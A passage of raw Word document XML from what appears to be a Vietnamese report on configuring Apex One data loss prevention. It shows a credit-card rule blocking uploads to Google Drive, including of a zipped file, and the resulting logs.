        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Apex One Data Loss Prevention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35875C40" w14:textId="276D20E2" w:rsidR="00B3316F" w:rsidRPr="00A96209" w:rsidRDefault="00B3316F" w:rsidP="00A96209">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3316F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="209336F9" wp14:editId="06106ABF">
            <wp:extent cx="5541645" cy="2867891"/>
            <wp:effectExtent l="19050" t="19050" r="20955" b="27940"/>
            <wp:docPr id="1504386195" name="Picture 1504386195"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6195" name="Hình ảnh 1" descr="Ảnh có chứa văn bản, ảnh chụp màn hình, phần mềm, Trang web&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId71"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5554768" cy="2874683"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1DB19C" w14:textId="449EFE07" w:rsidR="00D174CE" w:rsidRPr="00A96209" w:rsidRDefault="00D174CE" w:rsidP="00A96209">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A96209">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tạo policy</w:t>
      </w:r>
      <w:r w:rsidR="00783A5E" w:rsidRPr="00A96209">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, tiếp theo click vào Apex One DLP</w:t>
      </w:r>
      <w:r w:rsidR="00A2044A" w:rsidRPr="00A96209">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, trong mục </w:t>
      </w:r>
      <w:r w:rsidR="000571C5" w:rsidRPr="00A96209">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Rules, chọn </w:t>
      </w:r>
      <w:r w:rsidR="00D16944" w:rsidRPr="00A96209">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Add</w:t>
      </w:r>
      <w:r w:rsidR="00234AAE" w:rsidRPr="00A96209">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517DE58E" w14:textId="6BDD2E56" w:rsidR="00234AAE" w:rsidRPr="00A96209" w:rsidRDefault="00234AAE" w:rsidP="00A96209">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A96209">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Lúc này server sẽ popup lên một tab để chọn Rule:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCB3343" w14:textId="44F70AA4" w:rsidR="00234AAE" w:rsidRPr="00A96209" w:rsidRDefault="00234AAE" w:rsidP="00A96209">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00234AAE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="546013D6" wp14:editId="5217B5AE">
            <wp:extent cx="5500255" cy="2837180"/>
            <wp:effectExtent l="19050" t="19050" r="24765" b="20320"/>
            <wp:docPr id="1976379907" name="Picture 197637990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79907" name="Hình ảnh 1" descr="Ảnh có chứa văn bản, ảnh chụp màn hình, phần mềm, Trang web&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId72"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5502066" cy="2838114"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="459023A1" w14:textId="3B9EB8A7" w:rsidR="00C6785D" w:rsidRPr="00A96209" w:rsidRDefault="005466B8" w:rsidP="00A96209">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A96209">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Ở tab Template c</w:t>
      </w:r>
      <w:r w:rsidR="00BE2A70" w:rsidRPr="00A96209">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>lick vào rule cần deploy, ở đây nhóm chọn Credit Card Number</w:t>
      </w:r>
      <w:r w:rsidR="00BB2D09" w:rsidRPr="00A96209">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> sau đó click và </w:t>
      </w:r>
      <w:r w:rsidR="005B5282" w:rsidRPr="00A96209">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00BB2D09" w:rsidRPr="00A96209">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>dd</w:t>
      </w:r>
      <w:r w:rsidR="00C6785D" w:rsidRPr="00A96209">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA61A1C" w14:textId="5A9F1F1A" w:rsidR="00B00DCA" w:rsidRPr="006F3966" w:rsidRDefault="00C6785D"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 xml:space="preserve">Ở Tab tiếp theo </w:t>
      </w:r>
      <w:r w:rsidR="00677CC2" w:rsidRPr="006F3966">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">là chanel, để chọn những </w:t>
      </w:r>
      <w:r w:rsidR="005B25DC" w:rsidRPr="006F3966">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>dịch vụ mà</w:t>
      </w:r>
      <w:r w:rsidR="00E451C1" w:rsidRPr="006F3966">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002155F5" w:rsidRPr="006F3966">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sẽ được áp dụng DLP</w:t>
      </w:r>
      <w:r w:rsidR="005A3A6D" w:rsidRPr="006F3966">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7105E720" w14:textId="724357C5" w:rsidR="00A10B02" w:rsidRPr="006F3966" w:rsidRDefault="005A3A6D" w:rsidP="006F3966">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A3A6D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B2D8D2D" wp14:editId="0CBEB4AE">
            <wp:extent cx="5527551" cy="2784764"/>
            <wp:effectExtent l="19050" t="19050" r="16510" b="15875"/>
            <wp:docPr id="2146950810" name="Picture 214695081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0810" name="Hình ảnh 1" descr="Ảnh có chứa văn bản, ảnh chụp màn hình, phần mềm, Biểu tượng máy tính&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId73"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5535128" cy="2788581"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2256E02A" w14:textId="50C398E6" w:rsidR="00A10B02" w:rsidRPr="006F3966" w:rsidRDefault="00A10B02"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Ở tab cuối cùng là Action để block hoặc</w:t>
      </w:r>
      <w:r w:rsidR="009A769E" w:rsidRPr="006F3966">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> pass </w:t>
      </w:r>
      <w:r w:rsidR="00867816" w:rsidRPr="006F3966">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>với những</w:t>
      </w:r>
      <w:r w:rsidR="00653EEE" w:rsidRPr="006F3966">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> dữ liệu trùng với rule ở tab Temp</w:t>
      </w:r>
      <w:r w:rsidR="005466B8" w:rsidRPr="006F3966">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>late</w:t>
      </w:r>
      <w:r w:rsidR="00B00DCA" w:rsidRPr="006F3966">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00523A5F" w:rsidRPr="006F3966">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ở đây nhóm sẽ chọn block để ngăn chặn </w:t>
      </w:r>
      <w:r w:rsidR="00727EF9" w:rsidRPr="006F3966">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>mất mát dữ liệu creditcard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2407EA" w14:textId="0754A4A3" w:rsidR="00B00DCA" w:rsidRPr="006F3966" w:rsidRDefault="00B903D6" w:rsidP="006F3966">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B903D6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38A24A93" wp14:editId="5BF98A41">
            <wp:extent cx="5673436" cy="2829560"/>
            <wp:effectExtent l="19050" t="19050" r="22860" b="27940"/>
            <wp:docPr id="394758208" name="Picture 39475820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8208" name="Hình ảnh 1" descr="Ảnh có chứa văn bản, ảnh chụp màn hình, phần mềm, Biểu tượng máy tính&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId74"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5676341" cy="2831009"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="200EDEF3" w14:textId="39BECC7A" w:rsidR="00A3709A" w:rsidRPr="006F3966" w:rsidRDefault="00A3709A"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Cu</w:t>
      </w:r>
      <w:r w:rsidR="007A2A2A" w:rsidRPr="006F3966">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ối cùng là save và Deploy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0D6D83" w14:textId="18250170" w:rsidR="00285139" w:rsidRPr="006F3966" w:rsidRDefault="001E37CC" w:rsidP="006F3966">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F3966">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Gửi dữ liệu lên </w:t>
      </w:r>
      <w:r w:rsidR="00091FEE" w:rsidRPr="006F3966">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>credit card lên Google Drive:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9ACDB3" w14:textId="40D8C40E" w:rsidR="0070754B" w:rsidRPr="006F3966" w:rsidRDefault="00A60FDF"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Upload file đã tạo lên Google Drive:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFF558D" w14:textId="1D6D475B" w:rsidR="006E1D04" w:rsidRDefault="00EC1F6E" w:rsidP="006F3966">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC1F6E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D41A3D5" wp14:editId="605F6277">
            <wp:extent cx="5548745" cy="3039110"/>
            <wp:effectExtent l="19050" t="19050" r="13970" b="27940"/>
            <wp:docPr id="438429268" name="Picture 438429268"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9268" name="Hình ảnh 1" descr="Ảnh có chứa văn bản, phần mềm, Biểu tượng máy tính, Phần mềm đa phương tiện&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId75"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5549937" cy="3039763"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C611EBE" w14:textId="3E442009" w:rsidR="00EC1F6E" w:rsidRPr="006F3966" w:rsidRDefault="00774AFD"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Lúc này file sẽ không được up load và góc dưới mà hình sẽ hiện cảnh báo như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689F8EA2" w14:textId="74CBD00B" w:rsidR="001A6AB5" w:rsidRDefault="00774AFD" w:rsidP="006F3966">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00774AFD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EEEDF47" wp14:editId="0FF6BD2B">
            <wp:extent cx="5534891" cy="2897505"/>
            <wp:effectExtent l="19050" t="19050" r="27940" b="17145"/>
            <wp:docPr id="1926496841" name="Picture 192649684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6841" name="Hình ảnh 1" descr="Ảnh có chứa văn bản, phần mềm, Trang web, Website&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId76"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5537027" cy="2898623"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4043EA83" w14:textId="29DC3B77" w:rsidR="001A6AB5" w:rsidRPr="006F3966" w:rsidRDefault="001A6AB5"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Kiểm tra log khi này sẽ thấy s</w:t>
      </w:r>
      <w:r w:rsidR="00087382" w:rsidRPr="006F3966">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ource file và action là block, chanel là </w:t>
      </w:r>
      <w:r w:rsidR="005422EA" w:rsidRPr="006F3966">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>loại dịch vụ</w:t>
      </w:r>
      <w:r w:rsidR="0089719B" w:rsidRPr="006F3966">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, ở đây là Cloud Sync (Google Drive).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BCA3BE" w14:textId="0BAC5407" w:rsidR="00E145FC" w:rsidRDefault="001A6AB5" w:rsidP="006F3966">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71D72FB7" wp14:editId="226B8DF4">
            <wp:extent cx="5576455" cy="3047907"/>
            <wp:effectExtent l="19050" t="19050" r="24765" b="19685"/>
            <wp:docPr id="11232762" name="Picture 1123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831" cy="3050846"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1D668F" w14:textId="0BA97996" w:rsidR="00E145FC" w:rsidRPr="006F3966" w:rsidRDefault="00E145FC"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Nén file lại thành file zip để kiểm tra xem có upload lên được không:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734B6540" w14:textId="4E6BDB3D" w:rsidR="00E145FC" w:rsidRDefault="00AC21D3" w:rsidP="006F3966">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC21D3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4516E907" wp14:editId="4C34E4CE">
            <wp:extent cx="5618018" cy="3048000"/>
            <wp:effectExtent l="19050" t="19050" r="20955" b="19050"/>
            <wp:docPr id="1100169289" name="Picture 1100169289"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9289" name="Hình ảnh 1" descr="Ảnh có chứa văn bản, phần mềm, Biểu tượng máy tính, Phần mềm đa phương tiện&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId78"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5620389" cy="3049286"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA93BFC" w14:textId="7571B3BF" w:rsidR="006E1D04" w:rsidRPr="006F3966" w:rsidRDefault="006E1D04"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Lúc này thông báo vẫn hiện ra và không upload được:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3BC182" w14:textId="1E3DC053" w:rsidR="004F096A" w:rsidRDefault="004F096A" w:rsidP="006F3966">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F096A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CA443DC" wp14:editId="68B830F2">
            <wp:extent cx="5576455" cy="3034030"/>
            <wp:effectExtent l="19050" t="19050" r="24765" b="13970"/>
            <wp:docPr id="600838686" name="Picture 60083868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8686" name="Hình ảnh 1" descr="Ảnh có chứa văn bản, ảnh chụp màn hình, phần mềm, Trang web&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId79"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5578886" cy="3035353"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="713A69A4" w14:textId="2A6CFF35" w:rsidR="004F096A" w:rsidRPr="006F3966" w:rsidRDefault="004F096A"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Kiểm tra log:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A2230F" w14:textId="601F70EA" w:rsidR="004F096A" w:rsidRDefault="004F2D43" w:rsidP="006F3966">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C2838B4" wp14:editId="165915FE">
